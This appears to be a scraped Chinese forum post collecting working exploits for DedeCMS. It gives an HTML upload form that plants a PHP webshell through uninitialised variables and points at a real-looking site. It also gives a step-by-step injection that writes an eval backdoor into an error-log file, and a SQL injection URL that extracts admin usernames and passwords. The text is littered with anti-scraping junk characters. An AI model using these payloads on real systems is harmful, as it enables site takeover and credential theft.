$ y; O, `* s9 H, R) J织梦(Dedecms)select_soft_post.php页面变量未初始漏洞7 [1 [( z' b: m" {% P
<html>% f+ y4 o- z: W' _
<head>
% b; v6 s$ W: S4 t3 l ]( c) s<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>* y' Y$ r0 b% g$ o m
</head>
# o, x5 F, Z5 n<body style="FONT-SIZE: 9pt">* ~) g1 C0 b3 ]" z* X' I( f
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />; Z( N7 n# T- w0 {. N7 T% c4 t
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>" V1 b) _& w( Q% W3 }( C
<input type='hidden' name='activepath' value='/data/cache/' /> u# I* q# p5 P
<input type='hidden' name='cfg_basedir' value='../../' />
# J( k0 ~% S& ?: J" o" e! _; `' y6 T<input type='hidden' name='cfg_imgtype' value='php' />
; K0 l" A, l( p9 M<input type='hidden' name='cfg_not_allowall' value='txt' /> ^2 `1 t3 s. t5 a, o7 @
<input type='hidden' name='cfg_softtype' value='php' />& U- B9 R6 h. z# |# E
<input type='hidden' name='cfg_mediatype' value='php' />8 F' d7 o; o; R7 b
<input type='hidden' name='f' value='form1.enclosure' />& ?5 n" {+ s% l
<input type='hidden' name='job' value='upload' />
/ _2 \1 n, K* o, w! w1 Y<input type='hidden' name='newname' value='fly.php' />
, K1 G( @% |9 a$ WSelect U Shell <input type='file' name='uploadfile' size='25' />
+ c# y, K7 N) y2 B* r<input type='submit' name='sb1' value='确定' />
0 I! ]# P( ^. f- ~/ W; p! t</form>
+ I& T9 H9 M* L9 Y7 f<br />It's just a exp for the bug of Dedecms V55...<br />
3 K2 n4 U% A+ }( d2 m% w' |2 uNeed register_globals = on...<br />% \; T- U+ M+ D& f+ d% A% L9 G# n1 S
Fun the game,get a webshell at /data/cache/fly.php...<br />
0 r' ]9 K/ a |4 E. ]% ^</body>7 v* t* g- e6 _
</html>
& S/ E0 z: N6 g6 |! k! |+ s* O9 h/ w1 [- l+ @ L
5 s* S+ B( `' B1 ^+ \2 G- u) x
0 C: f. m4 ^: l, d
* A. ^( v5 C4 P d3 u: u4 A2 [- H: q' T' w5 G% R# _: }
) k0 i9 V1 z4 I6 P
0 Y3 S* n1 u" ]' _4 X# ]7 r9 f
6 ^, _9 u) ^% Q, ]2 x! U* Y+ t
, k: d+ R" J* r) N) @
( ?9 X8 d, o9 B' n9 ^织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞1 J1 U: g+ B' o& @
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。0 C1 V; N( K; W2 M5 G
1. 访问网址:
5 J+ T- h* K& j7 C. I$ Y+ t2 s3 Jhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
9 y9 @7 S2 d: U) s& s" k% [7 V- y可看见错误信息2 l: Q0 l R6 C% N7 F/ O: D3 @
* [3 n9 G# @+ R! O" C {( ?5 k
- ^: e, T9 p0 s2 ^1 n2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
2 l8 G. ?! A' q' Y# c# E3 `* bint(3) Error: Illegal double '1024e1024' value found during parsing3 y7 K* M7 }9 U
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
. h. |- E/ v& `$ R U! f
, r3 w+ X r/ J b1 ^5 q" e7 ^9 A% b
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是: p3 l O# t h6 J; N4 i3 ]. Q
" n1 U- q! Y+ L, E4 v+ y
2 e( a$ W8 m* S& z& r+ y<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
% A) l" B: ^6 w% w; u8 V1 C- c$ y
5 H1 ?: b, g" Y' m
' Y2 x' H6 r- w! m. [/ k f* R按确定后的看到第2步骤的信息表示文件木马上传成功.
# Z2 M; \) Y, ^9 i1 G/ Z
* r7 l8 ]: T* E, p- m1 D2 ]' B, C8 l c7 `+ b* R
' \1 _0 A* [, Q/ Q& t2 Y# k4 M l1 M/ Q
& F! Q3 }, }* B% m; n9 s) n# v$ [
& t. i4 y) E% {- e$ }$ _# n9 o( |" k$ D( Z3 A
. h2 x+ _5 {. b2 [# r# G
9 ~' i3 H$ ~, T( O6 m# u
, e- L) {0 `8 ?; R3 a4 g, e; {+ | z1 A/ O) a6 ]1 L9 B, W
8 s4 V2 W" s& |" x3 W织梦(DedeCms)plus/infosearch.php 文件注入漏洞! W* H" x$ F7 `6 H1 l/ |% a9 j0 l
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对